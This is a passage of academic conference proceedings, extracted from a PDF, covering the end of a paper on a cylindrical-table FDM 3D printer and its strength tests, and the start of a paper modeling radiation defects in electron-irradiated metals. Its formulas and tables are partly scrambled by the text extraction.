Fig. 11. The results of modeling the horizontal module: (a) change of the coordinates z3 and z4 in the period of oscillation damping; (b) the value of the coordinate, speed and acceleration of the first body in the period of oscillation damping
automatically. The grid geometry is corrected to even out the level of detailing all the objects (Fig. 12). Among the automatically created “Connected” contacts, the contacts of the guides and carriages are selected separately and their type is changed to “Sliding without separation”, which is more in line with their essence. The analysis of the obtained results has proved that the problems of significant displacement of points during the operation of the printer concern not only the rotating
476
A. Salenko et al.
table (relative to the table longitudinally movable), but also the system “print headguide”. This result requires additional design measures to prevent critical deformation and increase printing accuracy. Accounting for thermal phenomena from a heated working table (drum), based on (5), has made it possible to introduce nonlinear deformations of the table elements into the balance of errors. Ensuring uniform heating of the support drum is possible only in conditions when the heater (for example, in the form of a rod) will be immovably fixed under the surface of rotation, and is connected to the cantilever supports holding the drum. The maximum planning thermal deformations for the structure, the dimensions of which are shown in Fig. 8, for an average temperature T s = 135… 140 °C are 0.14 mm in the radial direction and 0.29 mm along the axis. The latter is fully compensated by the movement of the print head and is comparable to the error of linear movement along the y-axis.
Fig. 12. Grid model of the printer (a) and total offset of points of elements at operation (b)
Metrological inspection of printed samples proves that when printing on a flat table, the printing error for linear dimensions is in the range of 9–10 quality and makes T l = 0.15…0.17 mm, scattering of vertical dimensions – T h = 0.18–0.2 mm. Diametrical dimensions (holes) are made with scattering T v = 0.18. Thus all scattering of the dimensions can be brought to one general set, i.e. scattering meets the law of normal distribution. Therefore, under the same conditions, no significant factors affecting the accuracy of the reproduction of the form are identified. Printing on a cylindrical mandrel (table) shows the following results. When laying the filament at a length of L = 120.0 mm and L = 282.0 mm (length of the printed cylinder), the actual dimensions are performed with an error of 0.5 and 0.82 mm, respectively. Regarding the accuracy of vertical dimensions, there is some growth of T h . For the bore diameter ∅100–0.3 mm T h = 0.24…0.32 mm.
A New FDM Printer Concept for Printing Cylindrical Workpieces
477
Table 6 shows practical average values of mechanical tests for 3D PEEK and PLACarbon printed samples. During the tests, almost the same results are obtained as in paper [18]. Thus, samples made with a layer thickness of 300 μm have the highest strength in all mechanical tests. The strength of the samples with a layer thickness of 400 μm is lower. This is especially clear on PEEK plastic cracks. The calculation angle also has a significant impact, although smaller than the results of paper [18]. The greatest strength is achieved when the plastic is laid in the plane of the load. The lowest values of fracture toughness are achieved at normal separation by force F perpendicular to the layer-by-layer spreading. It is found that for the heater temperature T = 160 °C, heat flow q = 2.3 × 10–4 W and internal power source of power 2.3 × 105 W/m3 , mounted with a gap of 0.25 mm from the outer wall with a thickness of 3.2 mm with uniform rotation of the aluminum drum at a speed of 2…3 c−1 , we have a satisfactorily uniform temperature distribution within T = 147…153 °C (Fig. 13).
Fig. 13. The distribution of temperature fields by cross section in modeling heat transfer (ANSYS 18.2)
The main conclusions after the modeling are as follows: changing the dynamic parameters determines the form accuracy, and the dynamic phenomena of acceleration and rotating deceleration and linearly moving masses have a greater impact on the layer density compared with traditional devices, which requires special control algorithms in transient modes. The modeling considers the nonlinearity of the emerging friction forces, temperature deformations from heating the table and extruder, the cooling dynamics of the finished product, errors in the elements of the drive transverse movement and limited stiffness of the chain “base-nozzle extruder”. It is established that for standard components and used motor NEMA17 1.7A 17HS4401 at the thread speed of 120… 150 mm/min in the reverse of the transverse carriage (body 1, Fig. 5b) stroke there is a displacement error of up to 0.8 mm, which can cause an interturn cavity.
478
A. Salenko et al.
There is a significant difference in the strength of products obtained by laying on a flat table and on a cylindrical surface (Table 6). This is confirmed by the analysis of variance of the sample parameters σi . It should be noted that the strength indicators generally correspond to the calculated values only in the case of laying the filament on a cylindrical PEEK = 73.8 MPa, σPLA-C = 42.3 MPa ([σ]PEEK = 64 . . . 69 MPa and table, when σbmax bmax PLA-C = 36…42 MPa –calculated values). Another important conclusion indicating [σ] the feasibility of using a printer with a cylindrical table is that, based on Table 6, it can be seen that laying the filament at angles other than π/4 provides a lower strength of the product. Table 6. The results of sample tests at different loads Parameters PEEK
PLA-C
Layer thickness (μm)
Tensile strength (MPa)
Bending strength (MPa)
Compressive strength (MPa)
250
48.6
55.8
52.4
300
54.8
58.3
58.2
350
46.2
47.9
55.7
Layout on a flat table with different directions with a layer thickness 300 μm
0/90*
50.8
56.1
59.8
+45/−45
46.8
48.5
55.2
+30/−60
45.9
43.2
54.7
Layout on a cylindrical table
+45/−45
73.8
–
–
0/90*
69.3
–
–
Layer thickness (μm)
250
28.6
33.3
32.8
300
32.4
34.3
31.2
350
30.9
32.2
29.5
Layout on a flat table with different directions with a layer thickness 300 μm
0/90*
33.1
32.7
34.8
+45/−45
34.6
34.5
35.2
+30/−60
29.4
31.5
34.7
Layout on a cylindrical table
+45/−45
42.3
–
–
0/90*
38.8
–
–
*for a linear specimen when tested along the filament lay-out direction PEEK = 54.8 MPa, Layout on a flat table allows obtaining much lower performance: σbmax = 34.6 MPa. It should be noted that this strength is less than that stated by the filament manufacturer and is up to 72% for PEEK and up to 89% for PLA-C (the case of normal tensile force by static application). This agrees with the results reflected in [37]. PLA-C σbmax
A New FDM Printer Concept for Printing Cylindrical Workpieces
479
5 Discussion Experimental research of printing on a cylindrical liner reveals the efficiency of forming axisymmetric shells by FDM method. Mechanical tests of tank demonstrators also show a high dependence of strength indicators on the thickness of the printed layer (Table 6), the topology of laying out the filament on the table, as well as on laying conditions, primarily on the quality of adhesion sites that are formed during extrusion. Of course, the question may arise: does the essence of printing remain when using such bases, because you can only get a cylindrical blank of one inner diameter, which corresponds to the diameter of the liner. However, it should be noted that this method enables you to form any internal structure of the shell wall. For example, it can be honeycomb cavities, which, on the one hand, provide high thermal insulation properties, and on the other hand, provide auto-bonding of the two shells, which provides redistribution of stresses and, accordingly, increased strength of the product as a whole. The research of the strength characteristics of products obtained by FDM-processes on two printers, one of which is made according to the proposed concept, proves that the latter can be successfully used for the manufacture of axisymmetric shells, in particular, tanks with central holes. However, the main condition for the strength of such products is to provide a certain scheme of laying filament, in which it is possible to achieve strength indicators not worse than 0.75… 0.85 of material [σ]. Comparison of strength characteristics [σ], σb of cylindrical shells obtained by increasing the height along coordinate z with shells grown on a cylindrical mandrel in cross section of the layer thickness h proves that laying the filament at angles ±π/4 gives the maximum durability of a product under operation loadings. However, it is necessary to change the concept of working machines for the implementation of FDM-printing, because the implementation of laying the filament on the cylinder is insufficient. The problem of installation of flanges on the ends of the cylinder, which will later be muffled by the covers, also requires a solution. Another important parameter is the porosity of the resulting product, which manifests itself in incomplete contact between the stacked layers. In Fig. 14 an optical micrograph of the structure of the end face of the product obtained on a traditional printer (Fig. 14(a)) and the proposed one (Fig. 14(b)) is shown.
Fig. 14. The structure of the end face of the product (x40) obtained on a traditional printer (a) and the proposed one (b)
480
A. Salenko et al.
It is easy to see that in the latter case, the porosity is smaller, and individual deviations in the calculation are most likely determined by horizontal oscillations (Fig. 9) and, to a lesser extent, vertical oscillations (Fig. 8) of the extruder. The study of mass-weight characteristics has shown that for all samples, the decrease in porosity turns out to be significant, and the weight of the workpiece increases from 1.09 g/cm3 to 1.23 g/cm3 (with a dispersion parameter of 0.054 g/cm3 ). Therefore, further research should be aimed at ensuring rational parameters of layer adhesion due to temperature fields, as well as kinematic parameters of the laying process.
6 Conclusions For the first time, the use of morphological analysis and the principle of genetic development of working machine layouts make it possible to establish new conceptual solutions that allow to achieve the required conditions for the topology of filament laying out without using a significant number of axes. Such a solution is rational for the formation of axisymmetric shells in the form of tanks for various technological purposes. At the same time, the strength of the resulting products is the maximum achievable. The main practical result of the formulated scientific position is new concept of the printer for printing blanks on a basis other than the plane in the form of a collapsible cylinder proposal for the industrial use. The modeling of the printer operation is performed considering thermophysical and elastic phenomena in the proposed printer system. The conditions of reliable printing and minimization of product voids are established, and it is shown that the use of special control algorithms allows to eliminate the density drop phenomena at the ends of the cylindrical product (keeping the density at 95%). It is established that the surface density is inhomogeneous and decreases from 95% to 90% in the reverse of the head (at the liner ends), the cavities are up to 0.6 mm, based on a comparison of computer simulations and microphoto transients’ product zones, due to the dynamic phenomena of braking and acceleration of the extruder. This requires changing the stiffness and damping parameters in the extruder base-nozzle chain. Comparison of the strength of typical elements (shells) laid out on a flat basis by the method of construction of layers along the main axis of the product and on the cylindrical one, proves that the proposed concept allows to obtain product strength at 0.75… 0.85 [σ] strength of the material. Strength comparison of the typical elements (shells) laid out on a flat basis by the method of building layers along the main axis of the product and on a cylindrical one reveales the following: strength indicators generally correspond to the calculated values PEEK = 73.8 MPa, only in the case of laying the filament on a cylindrical table, when σbmax PLA-C PEEK PLA-C σbmax = 42.3 MPa ([σ] = 64 . . . 69 MPa and [σ] = 36…42 MPa – calculated values). PEEK = 54.8 MPa, Laying on a flat table allows to obtain much lower performance: σbmax PLA-C σbmax = 34.6 MPa. Note that this strength is less than that stated by the filament manufacturer and is up to 72% for PEEK and up to 89% for PLA-C (the case of normal tensile force by static application). Such characteristics are obtained by laying the thread at angles ±π/4, which also gives the maximum durability of the product under operating loads.
A New FDM Printer Concept for Printing Cylindrical Workpieces
481
Since mechanical tests and structural studies obtained using this printer prove its high efficiency (demonstrators reveal increased accuracy and density), further work on the device is seen in providing kinematic and design solutions that allow forming not only cylindrical, but also cylindroid products, minimizing the number of controlled axes in the device.
References 1. Sliusar, V.I.: Fabber-technologies. A new tool for three-dimensional modeling. Electron. Sci. Technol. Bus. 5, 54–60 (2003) 2. Murphy, V.S., Atala, A.: 3D-bioprinting of tissues and organs. Nat. Biotechnol. 32, 773–785 (2014). https://doi.org/10.1038/nbt.2958 3. 3D-printing for Everyone. SketchUp. http://www.sketchup.com 4. 3D Printing. 3D Printers. MakerBot. http://www.makerbot.com 5. ABS and PLA Plastics. What is the Difference Between ABS Plastic and PLA Plastic. http:// picaso-3d.com/ru/abs-i-pla-plastiki 6. Markov, O.E., Kukhar, V.V., Zlygoriev, V.N., Shapoval, A.A., Khvashchynskyi, A.S., Zhytnikov, R.U.: Improvement of upsetting process of four-beam workpieces based on computerized and physical modeling. FME Trans. 48, 946–953 (2020). https://doi.org/10.5937/fme 2004946M 7. Dragobetskii, V., Shapoval, A., Naumova, E., Shlyk, S., Mospan, D., Sikulskiy V.: The technology of production of a copper - aluminum - copper composite to produce current lead buses of the high - voltage plants. In: Proceedings of the International Conference on Modern Electrical and Energy Systems (MEES 2017), pp. 400–403 (2017). https://doi.org/10.1109/ MEES.2017.8248944 8. Lutsenko, I.: Definition of efficiency indicator and study of its main function as an optimization criterion. Eastern-Eur. J. Enterp. Technol. 6, 24–32 (2016). https://doi.org/10.15587/17294061.2016.85453 9. Schuldt, S.J.: A systematic review and analysis of the viability of 3D-printed construction in remote environments. Autom. Constr. 125, 103642 (2021). https://doi.org/10.1016/j.autcon. 2021.103642 10. Rivera, R.G., Alvarado, R.G., Martínez-Rocamora, A., Cheein, F.A.: A comprehensive performance evaluation of different mobile manipulators used as displaceable 3D printers of building elements for the construction industry. Sustainanility 12, 4378 (2020) 11. Gross, B.C., Erkal, J.L., Lockwood, S.Y., Chen, C., Spence, D.M.: Evaluation of 3D printing and its potential impact on biotechnology and the chemical sciences. Anal. Chem. 86(7), 3240–3253 (2014). https://doi.org/10.1021/ac403397r 12. Siddika, A., Al Mamun, M.A., Ferdous, W., Saha, A.K., Alyousef, R.: 3D-printed concrete: applications, performance, and challenges. J. Sustain. Cem. Mater. 9, 127–164 (2020) 13. Types of 3D Printers and Tree-Dimensional Printing. http://www.techno-guide.ru/informats ionnye-tekhnologii/3d-tekhnologii/vidy-3d-printerov-i-trekhmernoj-pechati.html 14. Rouf, S., Raina, A., Haq, M.I.U., Naveed, N., Jeganmohan, S., Kichloo, A.F.: 3D printed parts and mechanical properties: influencing parameters, sustainability aspects, global market scenario, challenges and applications. Adv. Ind. Eng. Polymer Res. 5(3), 143–158 (2022). https://doi.org/10.1016/j.aiepr.2022.02.001 15. Canessa, E., Fonda, C., Zennaro, M.: Low-Cost 3D Printing for Science, Education & Sustainable Development, 1st edn. ICTP-The Abdus Salam International Centre for Theoretical Physics, Trieste, Italy (2013)
482
A. Salenko et al.
16. Quigley, J.T.: Chinese Scientists are 3D-Printing Ears and Livers With Living Tissue (2013). https://thediplomat.com/2013/08/chinese-scientists-are-3d-printing-ears-and-liverswith-living-tissue/ 17. Home News. Updates 3D Printer Bed Adhesion. Testing Aqua Net Hair Spray and Other Tips. http://www.protoparadigm.com/news-updates/3d-printer-bed-adhesion-testingaqua-net-hair-spray-and-other-tips 18. KISSlicer [Keep It Simple Slicer]. http://www.kisslicer.com 19. RepRap: Blog: Vapor Treating ABS RP Parts. http://blog.reprap.org/2013/02/vapor-treatingabs-rp-parts.html 20. Cullen, A.T., Price, A.D.: Fabrication of 3D conjugated polymer structures via vat polymerization additive manufacturing. Smart Mater. Struct. 28, 104007 (2019) 21. 3D Printer Extruder. Review of 3D Printers. http://prn3d.ru/stati/pechat-na-3d-printere/ext ruder.html 22. Doely, P.K.: 3D Printing: A New Dimension in Construction. http://fwhtlaw.com/briefingpapers/3d-printing-new-dimension-construction 23. Özalp, F., Yilmaz, H.D.: Fresh and hardened properties of 3D high-strength printing concrete and its recent applications. Iran. J. Sci. Technol.-Trans. Civ. Eng. 44, 319–330 (2020) 24. Comparing mechanical properties of ABS and PLA filaments. https://www.liqcreate.com/sup portarticles/properties-fdm-sls-resin/ 25. Fang, G., Zhong, S., Zhong, Z., Zhang, T., Chen, X., Wang, C.C.L.: Reinforced FDM: multiaxis filament alignment with controlled anisotropic strength. ACM Trans. Graph. 39, 6 (2020). https://doi.org/10.1145/3414685.3417834 26. Isa, M.A., Lazoglu, I.: Five-axis additive manufacturing of freeform models through buildup of transition layers. J. Manuf. Syst. 50, 69–80 (2019). https://doi.org/10.1016/j.jmsy.2018. 12.002 27. Lim, S., Buswell, R.A., Valentine, P.J., Piker, D., Austin, S.A., Kestelier, X.D.: Modelling curved-layered printing paths for fabricating large-scale construction components. Addit. Manuf. 12, 216–230 (2016). https://doi.org/10.1016/j.addma.2016.06.004 28. https://hackaday.com/2016/07/27/3d-printering-non-planar-layer-fdm/ 29. Hong, F., Myant, C., Hodges, S., Boyle, D.: Open5x: Accessible 5-Axis 3D Printing and Conformal Slicing. arXiv2202.11426v2 (2022). https://arxiv.org/pdf/2202.11426.pdf 30. Gardner, J.A., Kaill, N., Campbell, R.I., Bingham, G.A., Engstrøm, D.S., Balc, N.O.: Aligning material extrusion direction with mechanical stress via 5-axis tool paths. In: 29th Annual International Solid Freeform Fabrication Symposium. An Additive Manufacturing Conference (SFF), pp. 2005–2019 (2018) 31. Kaill, N., Campbell, R.I., Pradel, P., Bingham, G.: A comparative study between 3-axis and 5-axis additively manufactured samples and their ability to resist compressive loading. In:Proceedings of the 30th Annual International Solid Freeform Fabrication Symposium, pp. 1818–1829 (2019) 32. Kampker, A., Triebs, J., Kawollek, S., Ayvaz, P., Hohenstein, S.: Review on machine design of material extrusion based additive manufacturing (AM) systems. Status-quo and potential analysis for manufacturing (AM) systems. In: 52nd CIRP Conference on Manufacturing Systems. Procedia CIRP, vol. 81, pp. 815–819 (2019). https://doi.org/10.1016/j.procir.2019. 03.205 33. Doyle, K., Doyle, A., Ó Brádaigh, C.M., Jaredson, D.: Feasibility of carbon fibre/peek composites for cryogenic fuel tank applications. https://www.researchgate.net/publication/289 961438 34. Kuznetsov, Yu.M.: World Trends and Prospects for the Development of Machine Tool Construction in Ukraine. Problems of Physical, Mathematical and Technical Education and Science of Ukraine in the Context of European Integration, pp. 45–55. NPU named after M.P. Drahomanova, Kyiv (2007)
A New FDM Printer Concept for Printing Cylindrical Workpieces
483
35. Kuznetsov, Yu.N.: Genetic and morphological principle of creating new generation machine tools. Bull. SevNTU. Mech. Energy Ecol. 110, 3–12 (2010) 36. GOST 23597-79, ISO 841-74, Machine Tools, Numerically Controlled. Designation of Axis and Motion Directions. General Statements (1979). https://meganorm.ru/Data2/1/4294830/ 4294830515.pdf 37. Salenko, A., Melnychuk, P., Lashko, E., Derevianko, I., Samusenko, O.: Ensuring the functional properties of responsible structural plastic elements by means of 3-D printing. Eastern-Eur. J. Enterp. Technol. 5(1–107), 18–28 (2020)
Computer Modeling of Processes of Radiation Defect Formation in Materials Irradiated with Electrons Tat’yana Shmygaleva1(B) and Aziza Srazhdinova2 1 Al-Farabi Kazakh National University, Almaty, Kazakhstan
[email protected] 2 Kazakh-British Technical University, Almaty, Kazakhstan
Abstract. Computer modeling of the spectrum of primary beaten-out atoms and the concentration of point radiation defects irradiated with electrons have been performed using cascade and probabilistic method. A mathematical model of energy spectrums of primary beaten-out atoms is obtained. Algorithms of calculating the primary beaten-out atoms spectrum and concentration of radiation defects are developed. Cascade and probabilistic functions are calculated subject to the quantity of interactions and infiltration base, primary beaten-out atoms spectrum, and defect concentrations in materials irradiated with electrons. The results of calculations of the defect concentration are compared with calculations made earlier without considering energy losses. It is apparent that accounting for energy losses makes a significant contribution to the primary beaten-out atoms and to the defect concentration. Keywords: Model · algorithm · calculation · electron · spectrum of primary beaten-out atoms · concentration of radiate on defects · cascade probabilistic function
1 Introduction For solids, ion irradiation is an efficient method to alter properties such as metal strength, corrosion resistance, metal fatigue, wear, etc. Nowadays, radiation physics of solids makes a considerable contribution to the advancement of nanophysics and the related applied field, nanoelectronics [1–5]. Under the effect of a certain type of bombarding particles in a material it is possible to form a predefined structure and chemical compounds that are totally stable over a wide range of temperatures [6–8]. Many papers have been on to the problems of interaction of particles with matter and generation of radiation defects when a substance is irradiated with protons, alpha particles, electrons and ions, in particular [9–14]. To analyze the results of various experiments, it is important to know which processes occur when a particle interacts with the target substance [15–17]. The interaction of particles with matter depends on their type, charge, mass, and energy. Each interaction leads to a loss of particle energy [18–21]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 484–499, 2023. https://doi.org/10.1007/978-3-031-35467-0_29
Computer Modeling of Processes of Radiation Defect Formation
485
The aim of the work is to study the parameters of radiation defect formation in materials irradiated with electrons, taking into account energy losses. In this connection, the following tasks are set: 1. to create a mathematical model of the energy spectra of primary knocked-out atoms; 2. to develop algorithms for calculating CPFs, spectra of PBOA, defect concentrations; 3. to develop a set of programs for calculating these characteristics and make calculations; 4. to compare the results obtained with the previous ones obtained without taking into account energy losses; 5. to compare the calculation results with the experiment. The subject of the study is the cascade probabilistic functions, the spectrum of primary knocked-out atoms, the concentration of radiation defects during electron irradiation. The object of the study is a solid, in our case the metals copper and molybdenum. We shall take into consideration the interaction of electrons with substance during the generation of radiation imperfections in solids. It is supposed that an electron formed at deep h cooperates with substance in the following way: 1. A charged particle loses energy in the ionization and excitation (the main type of energy loss). These losses are continuous over the deepness of the penetration of particles. 2. The electron forms primary beaten-out atom (PBOA), and for hundreds of interferences with the electrons of the medium (ionization losses), some interferences happen in the process of the formation of PBOA. 3. PBOA forms defects in the form of Frenkel pairs (vacancy, interstitial atom) in the case of electron irradiation. 4. For electrons, the relativistic case is considered since the kinetic energy of electrons is comparable to or greater than the rest energy of electrons. The interaction cross section is taken as the McKinley-Feshbach or Mott cross section [19]. In case of the interference of electrons with a solid, in particular when calculating the spectrum of PBOA, it is necessary to take into consideration the overall losses of energy for ionization and excitation during PBOA generation (in contrast to the simplest of cascade and probabilistic functions (CPFs), where the interaction path is constant) [19]. This work is carried out within the framework of the cascade-probabilistic method, the essence of which is to obtain and further apply cascade-probabilistic functions. CPFs make sense of the probability of a particle, in this case an electron, reaching the depth of registration h after the nth number of collisions. The spectrum of primary knocked-out atoms and the concentration of radiation defects are also important characteristics of the method. The PBOA spectrum makes sense of the probability that a certain number of secondary particles with energy E2 at depth h are formed from the 1st electron with energy E0 and is used later to calculate the concentration of radiation defects. Defect concentration there is a probability that a certain number of defects will be formed from one electron with energy E0 . Since the CP-method is analytical, it is possible to calculate all the parameters of the radiation defect formation at any depth of the irradiated material and trace the entire process of interaction of an electron with a substance and
486
T. Shmygaleva and A. Srazhdinova
the formation of radiation defects in dynamics. In this paper, analytical expressions are obtained, algorithms are developed and calculations of cascade probabilistic functions, the energy spectra of PBOA by depth and concentration of radiation defects in metals irradiated with electrons are performed and their characteristics are studied.
2 Materials and Methods The cascade probabilistic function, considering the energy loss for electrons, has the following form [19]: ⎛
ln ⎜ ⎜h − h − ⎜ i=1 ⎜ λ0 i ⎝
n n h , h, E0 =
E0 −kh
(E0 −kh) ak
⎞
⎟ ⎟ ⎟ · exp − h − h + 1 ln E0 − kh , ⎟ λ0 λ0 ak E0 − kh ⎠
(1) where n is the number of interplays, h , h is the depth of generation and registration of an electron, E 0 is the initial energy of an electron, σ0 , a, k are the approximation coefficients for the interaction cross section calculated using the McKinley-Feshbach formula, λ0 = 1/σ0 [19]: ⎡ ⎤ E2max 2 ln E2max + − 1 − β 2 2 2 2 E E d d 4πa0 εr z 1 − β ⎢ ⎥ · 1024 , 1 (2) σ(E1 ) = ⎣ ⎦ 2 2 4 4 E 2max β m1 c −1 +παβ 2 Ed where z is the atomic number of the medium, m1 c2 = 0.511 MeV is the rest energy of z , β = vc , v is the velocity of the falling particle, c is the light speed, an electron, a = 137 2E E +2m c2
E2max = 1 m1 c2 1 is the maximum kinetic energy received by an atom, E 1 is the 2 kinetic energy of a bombarding particle, in this case an electron; m2 c2 = A · 931.7 is the rest energy of an atom in MeV; A is the atomic mass; Ed is the displacement energy; a0 is the Bohr radius; εr is the Rydberg energy. Ionization energy losses are calculated using the Bethe-Bloch formula [19]: ⎡ ⎤ 2 ln m1 c2 ε(ε+2) 2 + + 1) dE (ε 2 ⎣ ⎦, (3) 2J 2 = f (E) = 2π r02 m1 c2 zn0 dx ε(ε + 2) + 1 + 1 ε − ε+1 ln2 (1+ε)2
where r 0 is the classical electron radius; ε = cm3 .
E1 m1 c2
8
ε+1
(2ε+1)2
is the potential of ionization; n0 is
the number of atoms in 1 The depths of observations are found by the formula h=−
E0 −E E0
dE . f (E)
(4)
Computer Modeling of Processes of Radiation Defect Formation
487
The cross sections calculated depending on the penetration depth are approximated by the following expression: 1 σ (h) = σ0 1 − , (5) c − bh where σ 0 , c = aE 0 , b = ak. The formula is used to calculate the CPFs [19]: ⎡ − ln(λ0 ) − ln(n!) + λ01ak ln EE00−kh − −kh n h , h, E0 = exp⎣ E0 −kh 1 +nln h − h ak ln E0 −kh
⎤
h−h λ0 + ⎦
.
(6)
The spectrum of PBOA is calculated by the formula W (E0 , E2 , h) = ⎛ ⎜ + nln⎜ ⎝h −
E0 1 h ln exp(− ln n! − n lnλ0 + − + n=0 h−kλ λ0 ak λ0 E0 − kh 2 ⎞
n1
ln
E0
E0 −kh
ak
h
⎟ h − h ⎟− − lnλ1 h − lnλ2 )ω(E1 , E2 )dh , ⎠ λ2
(7)
where λ1 , λ2 are the runs on electron-atomic, atom-atomic interactions, ω(E 1 , E 2 ) is the PBOA spectrum in a unit event. Previously, a simple formula was used to calculate the PBOA spectrum taking into account energy losses, which has the form W (E0 , E2 , h) =
ω(E1 , E2 , h) , λ1 (h)
(8)
where λ1 (h) =
σ0 1 −
1 1 c−bh
· 1024 (cm). n0
The concentration of point radiation defects during electron irradiation is calculated by the formula [19] Ck (E0 , h) =
E2max
ν(E2 )W (E0 , E2 , h)dE2 ,
(9)
Ec
where ν(E 2 ) is the cascade function which is presented in ν(E2 ) =
0, 4E2 Ed
(10)
488
T. Shmygaleva and A. Srazhdinova
3 Experiments Experimental data on the depth distribution of point defects in the case of electron irradiation at low temperatures are few. For comparison with empirical data, Fig. 1 illustrates the results of calculations of the dimensional allocations of radiation points of anchoring of dislocations in copper and molybdenum obtained by the method of internal friction [19]. The calculation of the anchoring points of dislocations was determined from the experimental dependency of the internal friction on the deformation amplitude. Irradiation was carried out at a temperature t = 40–800 °C up to a fluency of 1,017 electrons/cm2 (E 0 = 1.8 meV). As you can see, there is a good concordance.
Fig. 1. Distribution of dislocation anchoring points by depth in Mo (1) thickness of h = 0.5 mm and Cu (3): ▲– h = 0.3 mm, ● – 0.5 mm, × – 0.8 mm; 2 and 4 – calculated dependence of the point defect concentration on the depth using CP method for electrons; E 0 = 1.8 meV
4 Results and Discussions Figure 2 illustrates the dependencies of the cooperation cross sections and approximations on the penetration depth for electrons in copper at different values of E 0 . Crosses are the values calculated by the formula and solid curves are approximation values. Table 1 shows the values of the approximation parameters, theoretical correlation relations for electrons in copper at different values of the initial energy. Tables 2, 3, 4, 5 and 6 show
Computer Modeling of Processes of Radiation Defect Formation
489
the energies corresponding to them: energy losses for ionization and excitation, penetration depths, calculated values of interaction cross-sections, approximation values. The approximation results show that: 1. with an increase in E 0 , the theoretical correlation ratio decreases (the remaining parameters of the approximation fluctuate, sometimes increasing, sometimes decreasing) (Table 1); 2. with increasing penetration depth, the curves have a pronounced maximum, the selection of the approximation curve becomes more complicated and, consequently, the theoretical correlation ratio decreases (Tables 2, 3 and 4). At small values of the initial energy, the curves gradually decrease, without reaching a maximum (Tables 5, 6); 3. for electrons at energies below the threshold, within the framework of our suppositions, the process of formation of defects does not happen; consequently, this must also be taken into account when approximating (Tables 2, 3, 4, 5 and 6); 4. at small values of the initial energy, it is mandatory to have the required number of points, enough to fit the approximation curve (Tables 5, 6). The calculation results illustrate that the values found by formulas (2)–(4) and approximation (5) are very consistent. Theoretical correlations for all elements vary in the range of 0.8–0.9999. The results of calculating the CPFs depending on the quantity of interference are presented in Fig. 3, on the penetration depth h – in Fig. 4. Depending on the quantity of intercommunications at different h, the CPFs behave as follows: for small values of E 0 for all h, CPFs decrease, and with an increase in E 0 for small h, they also decrease. CPFs increase starting from some values of h, and reach a maximum, then decrease. Depending on h, the CPFs for electrons at small E 0 increase for all n ≥ 1 and decrease at n = 0. With an increase in E 0 , the CPFs for electrons at small h increase to a certain depth of observation, reaching a maximum, then start to decrease. With increasing n and h, the maximum shifts to the right and then starts to increase. The results of calculating the PBOA spectrum are illustrated in Fig. 5. It can be seen that the spectrum, depending on E 2 , is a decreasing function for all depth values. Moreover, at low values of the electron energy, the spectrum has the shape of a straight line. With an increase in the initial energy of the electron, the curves become smoother. The results of calculations of the concentration of radiation defects (Fig. 6) demonstrate that the curves have the shape of a decreasing dependence. The results of calculations are compared with calculations performed earlier using a simple formula (8) for the PBOA spectrum.
490
T. Shmygaleva and A. Srazhdinova
Curves that take into account energy losses pass either below or above the curves without taking into account energy losses. This is explained by the fact that the concentration values of radiation defects, taking into account energy losses, have smaller values compared to the concentration without taking them into account for light elements, for example, aluminum, titanium, for heavy elements of copper, molybdenum, on the contrary. This is explained by the fact that the cross-section values calculated by the McKinley-Feshbach formula for heavy elements, depending on the depth, increase, reaching a maximum, and then decrease, compared with light elements, for which the cross-section values, depending on the depth, have the form of a decreasing curve or the value of the function at the maximum point insignificant, compared to the value at the minimum point. In our case, the curves that take into account energy losses pass above the critical ones without taking into account energy losses, which confirms that it is necessary to take into account energy losses both when calculating the cascade probabilistic functions and when calculating the PBOA spectrum and the concentration of radiation defects. Energy losses make the most significant contribution in the field of low energies. Figure 7, 8 show fragments of program codes for calculating the spectra of PBOA and the concentration of radiation defects under electron irradiation.
Fig. 2. Depth dependence of the interaction cross section for electrons in copper on the number of interactions at different values of E 0 : 1–10; 2–8; 3–6; 4–4; 5–2 (MeV). Asterisks – calculated data of the dependency of the section of the deep, solid line is approximation
Computer Modeling of Processes of Radiation Defect Formation
491
Table 1. Approximation values and theoretical correlation relation for electrons in Cu E0 , MeV
σ0
c
b
η
1
93.17
8.31
106.1
0.9998
2
98.58
11.2
62.06
0.99998
4
98.88
28.4
87.99
0.998
6
94.52
49.06
105.3
0.997
8
93.37
76.64
126.9
0.991
10
92.27
128.8
175.5
0.98
20
89.07
718.8
525.9
0.8
Table 2. Energy, penetration depth, interaction cross-sections, approximation values of the interaction cross-section for electrons in Cu at E 0 = 10 meV №
dE/dx
E1
h
σ(E 1 )
σ(E 1 ) app.
1
14.5981
9.5
0.0341
89.9115
89.9115
2
14.5014
9.0
0.0685
90.0784
89.9105
3
14.3996
8.5
0.1031
90.2526
89.9085
4
14.2922
8.0
0.1380
90.4338
89.9075
5
14.1787
7.5
0.1731
90.6213
89.9065
6
14.0582
7.0
0.2085
90.8137
89.9035
7
13.9299
6.5
0.2442
91.0087
89.8993
8
13.7929
6.0
0.2803
91.2082
89.8941
9
13.646
5.5
0.3167
91.3879
89.8872
10
13.4878
5.0
0.3536
91.5554
89.8929
11
13.3168
4.5
0.3909
91.6875
89.8751
12
13.1313
4.0
0.4287
91.7559
89.8608
13
12.9293
3.5
0.4671
91.7127
89.8531
14
12.7095
3.0
0.5061
91.4739
89.8306
15
12.4723
2.5
0.5458
90.8869
89.8004
16
12.224
2.0
0.5863
89.6602
89.6667
17
11.9935
1.5
0.6276
87.2022
87.2025
18
11.9057
1.0
0.6695
82.2048
82.2040
19
12.7439
0.5
0.7106
69.7066
69.7066
492
T. Shmygaleva and A. Srazhdinova
Table 3. Energy, penetration depth, interaction cross-sections, approximation values of the interaction cross-section for electrons in Cu at E 0 = 8 meV №
dE/dx
E1
h
σ(E 1 )
σ(E 1 ) app.
1
14.2019
7.6
0.0281
90.5834
89.2391
2
14.1072
7.2
0.0563
90.7363
89.2381
3
14.0078
6.8
0.0848
90.8916
89.2371
4
13.9032
6.4
0.1134
91.0477
89.2360
5
13.7929
6.0
0.1423
91.2022
89.2346
6
13.6762
5.6
0.1714
91.3518
89.2331
7
13.5525
5.2
0.2008
91.4915
89.2313
8
13.4211
4.8
0.2305
91.6137
89.2292
9
13.2809
4.4
0.2605
91.7074
89.2267
10
13.1313
4.0
0.2907
91.7559
89.2237
11
12.9711
3.6
0.3214
91.7336
89.2198
12
12.7996
3.2
0.3524
91.6006
89.2149
13
12.6166
2.8
0.3839
91.2930
89.2083
14
12.4231
2.4
0.4158
90.7058
89.1991
15
12.224
2.0
0.4483
89.6602
89.1851
16
12.0349
1.6
0.4813
